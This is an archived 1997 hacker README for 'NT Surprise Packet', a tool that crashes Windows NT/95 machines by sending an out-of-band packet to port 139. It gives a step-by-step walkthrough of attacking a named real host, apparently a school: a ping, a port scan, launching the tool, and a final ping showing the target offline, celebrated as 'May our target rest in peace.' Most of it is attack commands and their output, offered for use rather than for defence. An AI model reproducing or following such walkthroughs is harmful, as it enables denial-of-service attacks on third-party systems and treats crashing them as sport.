home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / Hacking / NT Attack Folder.sit / NT Attack Folder / README < prev    next >
Text File  |  1997-05-14  |  3KB  |  75 lines
  1. NT Surprise Packet
  2. Version 1.0 Source Code Available
  3. k0ded by BlackHaze -> admin@bestmlm.net
  4.  
  5. How does it work?
  6. ----------------
  7. By sending a packet to port 139 with an 'Out Of Band' flag set
  8. exploits a bug in NT/Windows95 causing an exception to be thrown,
  9. and the computer crashes.
  10.  
  11. Whats wrong? It doesn't seem to work
  12. ----------------------------------
  13. Possibly your target has firewalled port 139 - Or your target
  14. is not running NT. 
  15.  
  16. How to use
  17. ---------
  18. Find a target running Windows NT; our target is loretonh.nsw.edu.au
  19.  
  20. Let's ping our target to see if its alive ...
  21.  
  22. root@cybernet# ping loretonh.nsw.edu.au
  23. PING loretonh.nsw.edu.au (198.142.96.1): 56 data bytes
  24. 64 bytes from 198.142.96.1: icmp_seq=0 ttl=52 time=483.314 ms
  25. 64 bytes from 198.142.96.1: icmp_seq=1 ttl=52 time=366.652 ms
  26. 64 bytes from 198.142.96.1: icmp_seq=2 ttl=52 time=349.986 ms
  27. 64 bytes from 198.142.96.1: icmp_seq=3 ttl=52 time=683.346 ms
  28. 64 bytes from 198.142.96.1: icmp_seq=4 ttl=52 time=350.026 ms
  29. ^C
  30. --- loretonh.nsw.edu.au ping statistics ---
  31. 5 packets transmitted, 5 packets received, 0% packet loss
  32. round-trip min/avg/max = 349.986/446.664/683.346 ms
  33.  
  34. Now we see if port 139 is open ...
  35.  
  36. root@cybernet# ./portscan loretonh.nsw.edu.au
  37. Host loretonh.nsw.edu.au, Port 7  ("echo" service) connection ... open.
  38. Host loretonh.nsw.edu.au, Port 9  ("discard" service) connection ... open.
  39. Host loretonh.nsw.edu.au, Port 13  ("daytime" service) connection ... open.
  40. Host loretonh.nsw.edu.au, Port 17  ("qotd" service) connection ... open.
  41. Host loretonh.nsw.edu.au, Port 19  ("chargen" service) connection ... open.
  42. Host loretonh.nsw.edu.au, Port 21  ("ftp" service) connection ... open.
  43. Host loretonh.nsw.edu.au, Port 25  ("smtp" service) connection ... open.
  44. Host loretonh.nsw.edu.au, Port 42  ("nameserver" service) connection ... open.
  45. Host loretonh.nsw.edu.au, Port 53  ("domain" service) connection ... open.
  46. Host loretonh.nsw.edu.au, Port 70 connection ... open.
  47. Host loretonh.nsw.edu.au, Port 79  ("finger" service) connection ... open.
  48. Host loretonh.nsw.edu.au, Port 110  ("pop" service) connection ... open.
  49. Host loretonh.nsw.edu.au, Port 135 connection ... open.
  50. Host loretonh.nsw.edu.au, Port 139 connection ... open.
  51.  
  52. Launch NT Surprise Packet & connect to loretonh.nsw.edu.au
  53. & click the 'Send Packet' button
  54.  
  55. root@cybernet# netstat -f inet
  56. Active Internet connections
  57. Proto Recv Send  Local Address                  Foreign Address          (state)
  58. tcp      0       46  cybernet.org.au/33249  h1.n96.ausnet.net./139   ESTABLISHED
  59.  
  60. The connection is established.
  61. Now, lets see if our host is alive ...
  62.  
  63. root@cybernet# ping loretonh.nsw.edu.au
  64. PING loretonh.nsw.edu.au (198.142.96.1): 56 data bytes
  65. ^C
  66. --- loretonh.nsw.edu.au ping statistics ---
  67. 10 packets transmitted, 0 packets received, 100% packet loss
  68.  
  69. May our target rest in peace.
  70.  
  71. Expect a patch by Microsoft to be released shortly
  72. --------------------------------------------------
  73. 'r0xn yer werld in 1997'
  74. http://gwc.com.au/admin
  75. admin@gwc.com.au